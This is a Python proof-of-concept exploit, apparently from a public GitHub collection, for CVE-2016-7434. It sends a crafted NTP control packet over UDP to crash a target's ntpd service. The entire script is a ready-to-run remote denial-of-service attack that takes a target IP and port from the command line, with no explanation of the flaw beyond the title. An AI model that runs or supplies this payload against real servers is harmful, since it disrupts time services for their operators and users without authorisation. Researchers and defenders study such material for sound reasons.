#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
    CVE-2016-7434 ntpd remote DOS by opsxcq (github.com/opsxcq/) 
"""

from sys import argv, exit
import socket
from argparse import ArgumentParser

def exploit(target, port):
    """CVE-2016-7434  exploit"""
    buffer="\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
    # Create a datagram socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(buffer, (target, port))
    print("[+] Exploit sent, please test the target\n")


if __name__ == "__main__":
    ap = ArgumentParser(description="CVE-2016-7434 ntpd remote DOS")
    ap.add_argument("-t", "--target", required=True, help="Target's IP address")
    ap.add_argument("-p", "--port", required=False, type=int, help="port where ntpd is running")
    args = vars(ap.parse_args())

    try:
        print("[*] Starting CVE-2016-7434 ntpd remote DOS")
        exploit(args["target"], args["port"])
    except IOError:
        exit("[!] Error sending packets")
    except KeyboardInterrupt:
        print("\n[*] Stopping the exploit")